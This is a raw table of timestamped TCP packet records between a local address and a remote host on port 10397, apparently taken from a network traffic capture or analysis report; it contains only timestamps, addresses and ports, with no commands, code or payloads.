                                          Dec 13, 2024 12:34:49.100548029 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.220525980 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.220655918 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.340519905 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.341020107 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.460896969 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.460995913 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.581064939 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.581221104 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.701471090 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.701766014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.821825027 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.821929932 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.942106009 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:49.942277908 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.062149048 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:50.062894106 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.182804108 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:50.183053970 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.303056002 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:50.303193092 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.423338890 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:50.423419952 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.543406963 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:50.543528080 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:50.663692951 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.281405926 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.401349068 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.401478052 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.521357059 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.521454096 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.641371965 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.641455889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.761327982 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.761590004 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:51.881511927 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:51.881791115 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.001701117 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.001794100 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.122898102 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.123220921 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.243243933 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.243365049 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.363415003 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.363718987 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.483603954 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.483681917 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.603943110 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.604163885 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.724467993 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.726298094 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.846208096 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.846306086 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:52.966768026 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:52.970388889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.091279030 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.091634035 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.211605072 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.214447021 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.334547043 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.334908962 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.455209970 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.455310106 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.575198889 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.575304985 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.695146084 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.695250988 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.815032005 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.815104961 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:53.935005903 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:53.935339928 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.055232048 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.055427074 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.175375938 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.175694942 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.295557022 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.295651913 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.457432985 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.457528114 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.661429882 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.662614107 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:54.909449100 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:54.910429001 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.157484055 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.157937050 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.405467987 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.406730890 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.653460026 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.653719902 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:55.901590109 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:55.901820898 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.149432898 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.149715900 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.397595882 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.397855997 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.645518064 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.645746946 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:56.898848057 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:56.918087006 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.166477919 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.166769028 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.413422108 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.413573027 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.661875963 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.663862944 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:57.909645081 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:57.912295103 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.157532930 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.157650948 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.405544043 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.405713081 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.653491020 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.653748989 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:58.901572943 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:58.903331041 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.153480053 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.153908014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.402312994 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.402915001 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.649451017 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.649777889 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:59.897502899 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:59.897974014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.145524979 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.146117926 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.393543005 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.393886089 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.641489983 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.641697884 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:00.889470100 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:00.889565945 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.137569904 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.137799978 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.385524035 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.385916948 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:01.633440971 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:01.999078035 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.119426966 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.119695902 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.243792057 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.244579077 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.364479065 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.370024920 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.490919113 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.492621899 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.612693071 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.616839886 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.736829996 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.739339113 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.859802008 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.859903097 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:02.979885101 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:02.980294943 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.100281954 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.104310036 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.224256992 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.228462934 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.348401070 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.348650932 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.468489885 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.468780041 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.589966059 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.590152025 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.710093021 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.710278034 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.830964088 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.831337929 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:03.951464891 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:03.951772928 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.114140987 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.114260912 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.317487001 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.317693949 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.565529108 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.566292048 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:04.813450098 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:04.813558102 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.065526962 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.065706015 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.313514948 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.315335989 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.561454058 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.561609030 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:05.809493065 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:05.811191082 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.058553934 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:06.059056044 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.306658983 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:06.310520887 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:06.442847967 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.451984882 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.571978092 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.572304964 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.575599909 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.695416927 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.695746899 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.816127062 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.818485975 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:08.938596964 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:08.944461107 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.064243078 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.064836979 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.188513994 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.188744068 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.308706045 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.320203066 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.442985058 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.443150997 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.563698053 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.572201967 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.692931890 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.693460941 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.813476086 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.813878059 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:09.936284065 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:09.940216064 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.060445070 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.060602903 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.180824041 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.181366920 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.301168919 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.301400900 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.421386957 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.421520948 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.541403055 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.543346882 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.663237095 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.664371014 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.784389019 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.788477898 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:10.908799887 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:10.911179066 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.031111956 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.031336069 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.158121109 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.158289909 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.278217077 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.278399944 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.398298979 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.402465105 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.522633076 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.522777081 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.642930984 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.643068075 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.763099909 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.763207912 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:11.883115053 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:11.883251905 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.003726959 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.005335093 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.125260115 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.125411987 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.245320082 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.246608973 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.366498947 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.366741896 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.486648083 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.486799955 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.606725931 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.607300997 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.727283955 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.731882095 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.851963997 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.852480888 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:12.972384930 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:12.976658106 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.096470118 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.096565008 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.216393948 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.218482971 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.338542938 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.340572119 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.460592985 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.465410948 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.585361958 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.586921930 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.708753109 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.709053040 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.829755068 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.829879045 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:13.950695992 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:13.951069117 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.072501898 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.072674990 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.192805052 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.193073988 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.314177990 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.314299107 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.434557915 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.435029984 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.556174040 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.556343079 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.679461956 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.680890083 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:14.800931931 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:14.804302931 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:15.149066925 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:15.150270939 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:15.313426018 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:15.318253994 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:15.521465063 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:15.522281885 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:15.769582033 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:15.769690037 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:16.017704010 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:16.017901897 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:16.265571117 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:16.265820026 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:16.517515898 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:16.517663002 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:16.765506029 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:16.766366005 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:17.013506889 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:17.014616013 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:17.261363983 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:17.262516975 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:17.509532928 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:17.510561943 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:17.757484913 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:17.760236979 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:18.005477905 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:18.005670071 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:18.253501892 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:18.255250931 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:18.501509905 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:18.501789093 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:18.749485016 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:18.749830008 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:18.997443914 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:18.999324083 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:19.245527029 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:19.248321056 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:19.493432045 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:19.494401932 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:19.745492935 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:19.746395111 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:19.997664928 CET1039749984147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:35:19.998652935 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.373963118 CET4998410397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:35:20.489926100 CET1039749984147.185.221.224192.168.2.5
